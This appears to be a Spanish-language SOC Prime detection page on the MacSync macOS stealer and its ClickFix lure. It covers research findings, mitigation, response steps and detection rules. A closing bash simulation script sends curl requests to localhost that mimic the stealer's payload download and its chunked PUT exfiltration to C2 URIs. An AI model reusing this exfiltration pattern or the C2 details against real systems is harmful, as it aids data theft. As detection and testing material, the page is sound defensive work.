SOC Prime Bias: High

09 Sep 2026 10:01 UTC

MacSync Stealer macOS utiliza ClickFix para eludir la detección

Author Photo
SOC Prime Team linkedin icon Seguir
MacSync Stealer macOS utiliza ClickFix para eludir la detección
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

MacSync Stealer es un malware-as-a-service (MaaS) enfocado en macOS que se basa en la ingeniería social estilo ClickFix para engañar a los usuarios y ejecutar comandos maliciosos en el Terminal. El malware sigue una cadena de ejecución modular y de múltiples etapas que involucra binarios Mach-O, ejecución de AppleScript en memoria y exfiltración de datos fragmentados. Para evadir la detección, utiliza ofuscación XOR, demonización de procesos y rápida eliminación de artefactos forenses.

Investigación

La investigación incluyó la ingeniería inversa de un preparador Mach-O de 64 bits para mapear su flujo de ejecución y técnicas de evasión. Los investigadores identificaron una clase plantilla de C++ que utiliza cifrado XOR de un solo byte con la clave 0xAA para ocultar cadenas funcionales y puntos finales C2. El análisis también descubrió un mecanismo avanzado de exfiltración que utiliza la dd utilidad para dividir los datos robados en fragmentos de 10 MB antes de las transferencias HTTP PUT.

Mitigación

Los usuarios deben ser entrenados para evitar copiar y pegar comandos de Terminal solicitados por errores del navegador, páginas de verificación falsas o ventanas emergentes de ClickFix. Las organizaciones deben monitorear de cerca la actividad del Terminal y la ejecución no autorizada de osascript. Restringir binarios no notarizados y monitorear la creación o ejecución de archivos sospechosos en /tmp puede reducir aún más la exposición.

Respuesta

Si se detecta actividad de MacSync, el punto final de macOS afectado debe aislarse inmediatamente para detener la exfiltración de datos. Los respondedores deben realizar un análisis forense del /tmp directorio e inspeccionar ~/Library/LaunchAgents/ en busca de plist de persistencia maliciosa. Los registros del sistema también deben ser revisados para detección no autorizada osascript y el tráfico de red revisado para conexiones a dominios C2 conocidos.

Flujo de Ataque

Todavía estamos actualizando esta parte.

Detecciones

Intento de Ejecución de Curl Sospechosa [MacOS] (vía línea de comandos)

Team de SOC Prime
08 Sep 2026

Archivo Fue Creado en la Carpeta Temporal de MacOS (vía evento_de_archivo)

Team de SOC Prime
08 Sep 2026

IOC (HashSha256) para detectar: MacSync: el Evasivo Stealer de macOS que Explota Cebo de ClickFix

Reglas de IA de SOC Prime
08 Sep 2026

IOC (HashSha1) para detectar: MacSync: el Evasivo Stealer de macOS que Explota Cebo de ClickFix

Reglas de IA de SOC Prime
08 Sep 2026

IOC (HashMd5) para detectar: MacSync: el Evasivo Stealer de macOS que Explota Cebo de ClickFix

Reglas de IA de SOC Prime
08 Sep 2026

MacSync Stealer – Detección Basada en URI [Servidor Web]

Reglas de IA de SOC Prime
08 Sep 2026

MacSync: Daemonización de Sesión Oculta en macOS [Creación de Proceso en Linux]

Reglas de IA de SOC Prime
08 Sep 2026

Ejecución de Simulación

Requisito Previo: La Verificación Previa de Telemetría & Línea Base debe haber pasado.

Justificación: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y aspirar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa de Ataque & Comandos: El atacante intenta imitar el ciclo de comunicación del stealer MacSync. Primero, el atacante simula un señuelo de «Clickfix» donde se instruye a la máquina de la víctima a descargar una carga útil a través de un URI específico: /dynamic?txd=. Una vez que el «malware» está en ejecución, realiza la exfiltración enviando fragmentos de datos robados de regreso al servidor C2 usando una PUT solicitud al URI /gate?buildtxd=. Esto simula el patrón exacto que la regla de detección está buscando.

  • Guión de Prueba de Regresión: Este script utiliza curl para generar las solicitudes HTTP específicas que coinciden con los criterios de selección de URI de la regla Sigma.

    #!/bin/bash
    # Script de Simulación de URI de MacSync Stealer
    # Este script simula las solicitudes GET y PUT utilizadas por MacSync
    
    TARGET_URL="http://localhost"
    
    echo "[+] Simulando Descarga de Carga Útil (GET /dynamic?txd=)..."
    curl -X GET "$TARGET_URL/dynamic?txd=malicious_payload_123" -s -o /dev/null
    
    echo "[+] Simulando Exfiltración de Datos (PUT /gate?buildtxd=)..."
    # Simulando una carga fragmentada de 10MB como se menciona en la descripción de la regla
    dd if=/dev/urandom of=chunk.bin bs=1M count=10 2>/dev/null
    curl -X PUT "$TARGET_URL/gate?buildtxd=exfil_data_456" 
         --data-binary @chunk.bin 
         -s -o /dev/null
    
    echo "[+] Simulación Completa."
  • Comandos de Limpieza:

    # Eliminar el fragmento de datos de prueba creado durante la simulación
    rm -f chunk.bin